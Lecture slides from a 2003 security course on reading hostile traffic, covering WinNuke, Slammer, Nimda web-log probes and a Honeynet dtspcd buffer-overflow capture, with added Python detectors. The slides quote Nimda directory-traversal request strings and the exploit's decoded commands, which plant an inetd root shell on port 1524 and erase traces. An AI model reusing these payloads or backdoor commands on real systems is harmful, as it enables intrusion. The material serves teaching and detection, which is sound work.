Lecture 25: Network Primer 7/17/2003 CSCE 590 Summer 2003
WinNuke
nuker.com > victim.edu.139: FP 0:3(3) ack 1 win 8760 urg 3 (DF)
And This?
3:46: dos.com > : (frag
Bad Network Traffic in Other Places
Web logs
Traffic monitoring graphs
Firewall logs
Intrusion detection systems
Router syslogs
I even see attempts against my SSH tunnels!
Slammer
02:06: > ms-sql-m: udp
:06: > : icmp: udp port ms-sql-m unreachable [tos 0xc0]
Nimda
[12/Apr/2002:12:01: ] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
[12/Apr/2002:12:01: ] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
[12/Apr/2002:12:01: ] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
[12/Apr/2002:12:01: ] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
[12/Apr/2002:12:01: ] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
[12/Apr/2002:12:01: ] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
[12/Apr/2002:12:01: ] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
[12/Apr/2002:12:01: ] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
[12/Apr/2002:12:01: ] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
[12/Apr/2002:12:01: ] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 -
[12/Apr/2002:12:01: ] "GET /scripts/..%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
[12/Apr/2002:12:01: ] "GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
[12/Apr/2002:12:01: ] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
[12/Apr/2002:12:01: ] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 -
Firewall Logs
Intrusion Detection Systems
Lets us detect signatures inside packets
It would be very hard to write a tcpdump filter for Nimda
More versatile than tcpdump
Tcpdump is more universal and quicker
Tcpdump allows you to record all traffic; an IDS usually only records matches on signatures
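Added example (not from the lecture): a small Python detector for the Nimda probes shown in the web log slide, making the IDS slide's point concrete: the signature has to be matched on the request after decoding, which a tcpdump filter cannot express. The log lines, client addresses and function names are constructed for the example.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample web log (Apache-style), not the lecture's own log: three probes
# in encodings the Nimda slide shows, plus one benign request.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Apr/2002:12:01:00 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 -
10.0.0.5 - - [12/Apr/2002:12:01:01 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 -
10.0.0.5 - - [12/Apr/2002:12:01:02 -0400] "GET /_vti_bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 -
10.0.0.9 - - [12/Apr/2002:12:02:00 -0400] "GET /index.html HTTP/1.0" 200 1234
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

# Overlong/invalid UTF-8 byte pairs that the targeted IIS builds decoded as a path separator.
OVERLONG_SEPARATORS = (b"\xc0\xaf", b"\xc0\x2f", b"\xc1\x9c", b"\xc1\x1c")


def normalize_path(raw: str) -> str:
    """Decode the path the way a lenient server would: percent-decode repeatedly
    until stable (so %255c -> %5c -> backslash), map overlong UTF-8 separators
    and backslashes to '/', and lower-case the result."""
    data = raw.encode("latin-1")
    for _ in range(4):  # bounded loop; double encoding needs two rounds
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    for seq in OVERLONG_SEPARATORS:
        data = data.replace(seq, b"/")
    return data.replace(b"\\", b"/").decode("latin-1").lower()


def is_nimda_probe(path: str) -> bool:
    """Directory traversal that reaches cmd.exe: the signature the log slide shows."""
    norm = normalize_path(path)
    return "../" in norm and "cmd.exe" in norm


def scan_log(text: str) -> list:
    """Return (client, decoded path) for each request that matches the signature."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m and is_nimda_probe(m.group("path")):
            hits.append((line.split()[0], normalize_path(m.group("path"))))
    return hits
```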
Solaris dtspcd Attack
Honeynet.org Scan of the Month, Scan 20
Let’s just scan through the network capture with tcpdump and see what we see
Then we’ll look at it with Ethereal
10:45: IP > : P 1:34(33) ack 1 win (DF)
[hex/ASCII packet dump; hex column lost in extraction. Readable ASCII column: ...f.....*n'_7.. ..>..] ?q root.]
10:45: IP > : . ack 34 win <nop,nop,timestamp > (DF)
[hex/ASCII packet dump; not recoverable from the extraction]
10:45: IP > : P 1:68(67) ack 34 win (DF)
[hex/ASCII packet dump; hex column lost in extraction. Readable ASCII column: //.SP C_AAAH_aqWg .buzzy:SunOS:5.8:sun4u.]
What did we see?
Src address:
Dst address:
Target port: 6112
– Solaris Common Desktop Environment
– Dtspcd: CDE Subprocess Control Service
– network daemon that accepts requests from clients to execute commands and launch applications remotely
– Runs as root
– Usually spawned by inetd or xinetd in response to a CDE client request
What else?
In the first packet from attacker to victim, we see the word “root”. Hmmmm
Then the victim starts answering back
In the third packet it announces what operating system it is running and its architecture
Going on…
10:46: IP > : P 1:1449(1448) ack 1 win (DF)
[hex/ASCII dump of the 1448-byte exploit packet; hex column lost in extraction. The payload is line after line of 801c 4011 words (the slide cuts 67 of those lines: "Etc .... Etc .... Cut here...."), then the shellcode, then the readable ASCII column (joined across dump lines): /bin/ksh....-c..echo."ingreslock.stream.tcp.nowait.root./bin/sh.sh.-i">/tmp/x;/usr/sbin/inetd.-s./tmp/x;sleep.10;/bin/rm.-f./tmp/x.AAAAAAAAAAAAAAAA...]
Now what did we see?
Lots of “801C 4011”; cut out 67 lines of them
We have here a Sparc NOP slide
– An Intel x86 slide would have “90 90”s
– Common technique in buffer-overflow attacks
– Try to get the exploited program to execute shell code as the program owner
– Increases the odds the buffer overflow will execute the exploit code without having to figure out exact locations
– If the buffer overflow pointer lands in them, the exploit code will eventually be run
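Added example (not part of the lecture or the Honeynet challenge): a run-length scanner for the two NOP slide patterns the slide names, the SPARC 801c 4011 word and the x86 0x90 byte, run over a constructed payload shaped like the exploit packet (a short header, a long slide, then the command string). The threshold and function names are assumptions.

```python
SPARC_NOP = bytes.fromhex("801c4011")  # the 4-byte pattern the slide describes
X86_NOP = b"\x90"


def longest_run(payload: bytes, pattern: bytes) -> tuple:
    """Return (offset, count) of the longest run of back-to-back copies of pattern;
    (-1, 0) when the pattern never occurs."""
    best_off, best_n = -1, 0
    i, step = 0, len(pattern)
    while i <= len(payload) - step:
        if payload[i:i + step] == pattern:
            j = i
            while payload[j:j + step] == pattern:
                j += step
            n = (j - i) // step
            if n > best_n:
                best_off, best_n = i, n
            i = j  # resume after the run
        else:
            i += 1  # unaligned scan so any start offset is found
    return best_off, best_n


def detect_nop_sled(payload: bytes, min_repeats: int = 16) -> dict:
    """Report each architecture whose NOP pattern repeats at least min_repeats times.
    min_repeats is an assumed tuning value: real traffic rarely repeats either
    pattern that often, so it keeps false positives low without hiding a slide."""
    findings = {}
    for arch, pattern in (("sparc", SPARC_NOP), ("x86", X86_NOP)):
        off, n = longest_run(payload, pattern)
        if n >= min_repeats:
            findings[arch] = {"offset": off, "repeats": n, "bytes": n * len(pattern)}
    return findings


# Constructed sample payload modelled on the capture: a 4-byte header, 200 SPARC
# NOP words, then the command string the exploit carries.
SAMPLE_PAYLOAD = (
    b"\x00\x00\x00\x01" + SPARC_NOP * 200 +
    b'/bin/ksh -c echo "ingreslock stream tcp nowait root /bin/sh sh -i">/tmp/x;'
)
```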
What code will be run?
If we read the shell code, we’d see that the following will be exec’ed:
1. /bin/ksh -c echo "ingreslock stream tcp nowait root /bin/sh sh -i">/tmp/x;
2. /usr/sbin/inetd -s /tmp/x;
3. sleep 10;
4. /bin/rm -f /tmp/x
Line 1 uses ksh to execute an echo command. The echo writes a pre-formatted inetd line to a temp file, /tmp/x
Line 2: runs inetd, using /tmp/x as its configuration
Line 3: sleeps 10 seconds to make sure inetd has started
Line 4: cleans up the evidence
The inetd Line
What does the inetd line do?
ingreslock stream tcp nowait root /bin/sh sh -i
Ingreslock is TCP port 1524
This line opens up an interactive root shell when someone connects to TCP port 1524
Guess what happens a little later?
10:46: IP > : P 1:209(208) ack (DF)
[hex/ASCII packet dump; hex column lost in extraction. Readable ASCII column (joined across dump lines): .?z.uname.-a;ls.-l./core./var/dt/tmp/DTSPCD.log;PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/ccs/bin:/usr/gnu/bin;export.PATH;echo."BD.PID(s):."`ps.-fed|grep.'.-s./tmp/x'|grep.-v.grep|awk.'{print.$2}'`.]
What happened here?
Looks scripted. Why?
1. uname -a;
2. ls -l /core /var/dt/tmp/DTSPCD.log;
3. PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/ccs/bin:/usr/gnu/bin;
4. export PATH;
5. echo "BD PID(s): "`ps -fed|grep ' -s /tmp/x'|grep -v grep|awk '{print $2}'`
10:46: IP > : P 3:98(95) ack 209 win (DF)
[hex/ASCII packet dump; hex column lost in extraction. Readable ASCII column: SunOS.buzzy. ... Generic_1085 ... sun4u.sparc.SUNW,Ultra-5_1 ... /core:.No.such.file.or.directory.]
10:46: IP > : P 98:148(50) ack 209 win (DF)
[readable ASCII column: /var/dt/tmp/DTSPCD.log:.No.such.file.or.directory.]
10:46: IP > : P 148:164(16) ack 209 win (DF)
[readable ASCII column: BD.PID(s):.3476.]
The Output from the Commands
1. # SunOS buzzy 5.8 Generic_ sun4u sparc SUNW,Ultra-5_10
2. /core: No such file or directory
3. /var/dt/tmp/DTSPCD.log: No such file or directory
4. BD PID(s): 3476
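Added example, not the lecture's or Honeynet's code: a parser for the line from the "inetd Line" slide that states why it is a bind-shell backdoor, plus a defender's version of the attacker's own `ps -fed | grep ' -s /tmp/x'` check that finds any inetd started with a configuration file outside /etc. The port table, shell list and ps listing are constructed; only ingreslock = 1524, the inetd line and PID 3476 come from the slides.

```python
import shlex
# Stand-in for /etc/services: ingreslock = 1524 as the slide states, plus well-known ports.
SERVICES = {"ingreslock": 1524, "ftp": 21, "telnet": 23, "shell": 514}
SHELLS = {"/bin/sh", "/bin/ksh", "/bin/csh", "/bin/bash", "/usr/bin/ksh"}


def parse_inetd_line(line: str) -> dict:
    """Split an inetd.conf entry: service socktype proto wait/nowait user server args..."""
    f = shlex.split(line, comments=True)
    if len(f) < 6:
        raise ValueError("not an inetd.conf service line: %r" % line)
    return {"service": f[0], "port": SERVICES.get(f[0]), "socktype": f[1], "proto": f[2],
            "wait": f[3], "user": f[4], "server": f[5], "args": f[6:]}


def backdoor_reasons(entry: dict) -> list:
    """Why an entry looks like a bind shell rather than a real network service."""
    reasons = []
    if entry["server"] in SHELLS:
        reasons.append("server program is a shell: " + entry["server"])
    if "-i" in entry["args"]:
        reasons.append("shell is started interactively (-i)")
    if reasons and entry["user"] == "root":
        reasons.append("and it runs as root")
    return reasons


def rogue_inetd_processes(ps_output: str) -> list:
    """From ps -ef style text, return (pid, config) for every inetd started with
    -s <file> where the file is outside /etc, as the exploit's /tmp/x is."""
    rogue = []
    for line in ps_output.splitlines():
        cols = line.split()
        cmd = next((i for i, c in enumerate(cols) if c.endswith("inetd")), None)
        if cmd is None or "-s" not in cols[cmd + 1:]:
            continue
        rest = cols[cols.index("-s", cmd) + 1:]
        if rest and rest[0].startswith("/") and not rest[0].startswith("/etc/"):
            rogue.append((cols[1], rest[0]))  # PID is the second ps -ef column
    return rogue


# Constructed sample input: the slide's inetd line and a ps listing where PID 3476 is the backdoor.
BACKDOOR_LINE = "ingreslock stream tcp nowait root /bin/sh sh -i"
SAMPLE_PS = """\
     UID   PID  PPID  C    STIME TTY      TIME CMD
    root   142     1  0   Jan 01 ?        0:00 /usr/sbin/inetd -s
    root  3476  3470  0 10:46:00 ?        0:00 /usr/sbin/inetd -s /tmp/x
"""
```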
Interactive Commands
Let’s go to Ethereal for this part…
References